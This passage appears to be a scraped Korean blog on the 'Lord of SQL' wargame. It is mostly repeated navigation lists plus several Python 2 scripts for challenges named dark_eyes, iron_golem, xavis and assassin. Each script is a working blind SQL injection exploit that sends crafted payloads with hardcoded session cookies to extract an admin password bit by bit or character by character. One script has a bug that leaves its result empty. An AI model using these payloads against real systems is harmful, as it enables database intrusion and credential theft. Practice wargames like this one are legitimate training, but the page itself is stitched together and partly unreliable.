깨진 문제.
'Wargame > Lord of SQL' 카테고리의 다른 글
LOS All Clear (0) | 2018.02.09 |
---|---|
LOS umaru (0) | 2018.02.09 |
LOS hell_fire (0) | 2018.02.09 |
LOS dark_eyes (0) | 2018.02.08 |
LOS iron_golem (0) | 2018.02.08 |
깨진 문제.
LOS All Clear (0) | 2018.02.09 |
---|---|
LOS umaru (0) | 2018.02.09 |
LOS hell_fire (0) | 2018.02.09 |
LOS dark_eyes (0) | 2018.02.08 |
LOS iron_golem (0) | 2018.02.08 |
깨진 문제.
LOS umaru (0) | 2018.02.09 |
---|---|
LOS evil_wizard (0) | 2018.02.09 |
LOS dark_eyes (0) | 2018.02.08 |
LOS iron_golem (0) | 2018.02.08 |
LOS dragon (0) | 2018.02.08 |
import urllib2
def request(data):
url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
response = urllib2.urlopen(req).read()
if "addslashes" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
binary = ""
for i in range(0,100):
payload = "' or 1=1 and id='admin' and 1=(select "+str(i)+" in (length(pw),(select 1 union select 2)))#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
binary = ""
for i in range(1,9):
payload = "' or id='admin' and 1=(select 1 in (substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1),(select 1 union select 2)))#"
if request(payload)==True:
binary += "1"
else:
binary += "0"
admin_pw += chr(int(binary,2))
print "[-]Admin Password = " + admin_pw
print "[*]Admin Password = " + admin_pw
LOS evil_wizard (0) | 2018.02.09 |
---|---|
LOS hell_fire (0) | 2018.02.09 |
LOS iron_golem (0) | 2018.02.08 |
LOS dragon (0) | 2018.02.08 |
LOS xavis (0) | 2018.02.08 |
import urllib2
def request(data):
url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
response = urllib2.urlopen(req).read()
if "more than 1 row" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
binary = ""
for i in range(0,100):
payload = "' or id='admin' and if(length(pw)="+str(i)+",(select 1 union select 2),1)#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
binary = ""
for i in range(1,9):
payload = "' or id='admin' and if(substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1)=1,(select 1 union select 2),1)#"
if request(payload)==True:
binary += "1"
else:
binary += "0"
print "[-]Admin Password = " + admin_pw
print "[*]Admin Password = " + admin_pw
LOS hell_fire (0) | 2018.02.09 |
---|---|
LOS dark_eyes (0) | 2018.02.08 |
LOS dragon (0) | 2018.02.08 |
LOS xavis (0) | 2018.02.08 |
LOS nightmare (0) | 2018.02.08 |
LOS dark_eyes (0) | 2018.02.08 |
---|---|
LOS iron_golem (0) | 2018.02.08 |
LOS xavis (0) | 2018.02.08 |
LOS nightmare (0) | 2018.02.08 |
LOS succubus (0) | 2018.02.08 |
import urllib2
def request(data):
url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdef"
for i in range(0,100):
payload = "' or id='admin' and length(hex(pw))="+str(i)+"#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "' or id='admin' and right(lpad(hex(pw),"+str(j)+",space(0)),1)='"+strings[i]+"'#"
if request(payload)==True:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
LOS iron_golem (0) | 2018.02.08 |
---|---|
LOS dragon (0) | 2018.02.08 |
LOS nightmare (0) | 2018.02.08 |
LOS succubus (0) | 2018.02.08 |
LOS zombie_assassin (0) | 2018.02.08 |
LOS dragon (0) | 2018.02.08 |
---|---|
LOS xavis (0) | 2018.02.08 |
LOS succubus (0) | 2018.02.08 |
LOS zombie_assassin (0) | 2018.02.08 |
LOS assassin (0) | 2018.02.08 |
LOS xavis (0) | 2018.02.08 |
---|---|
LOS nightmare (0) | 2018.02.08 |
LOS zombie_assassin (0) | 2018.02.08 |
LOS assassin (0) | 2018.02.08 |
LOS giant (0) | 2018.02.08 |
LOS nightmare (0) | 2018.02.08 |
---|---|
LOS succubus (0) | 2018.02.08 |
LOS assassin (0) | 2018.02.08 |
LOS giant (0) | 2018.02.08 |
LOS bugbear (0) | 2018.02.08 |
import urllib2
def request(data):
url = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return "admin"
elif "Hello guest" in str(response):
return "guest"
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@"
tmp = ""
tmp1 = 0
payload = ""
for i in range(1,51):
payload += "_"
result = request(payload)
if result=="admin":
length = i
break
if result=="guest":
tmp1 = i
if i==50:
length=tmp1
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = admin_pw+strings[i]+"_"*(8-j)
result = request(payload)
if result == "admin":
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
if result == "guest":
tmp = strings[i]
if i==len(strings)-1:
admin_pw+=tmp
print "[*]Admin Password = " + admin_pw
LOS succubus (0) | 2018.02.08 |
---|---|
LOS zombie_assassin (0) | 2018.02.08 |
LOS giant (0) | 2018.02.08 |
LOS bugbear (0) | 2018.02.08 |
LOS darknight (0) | 2018.02.08 |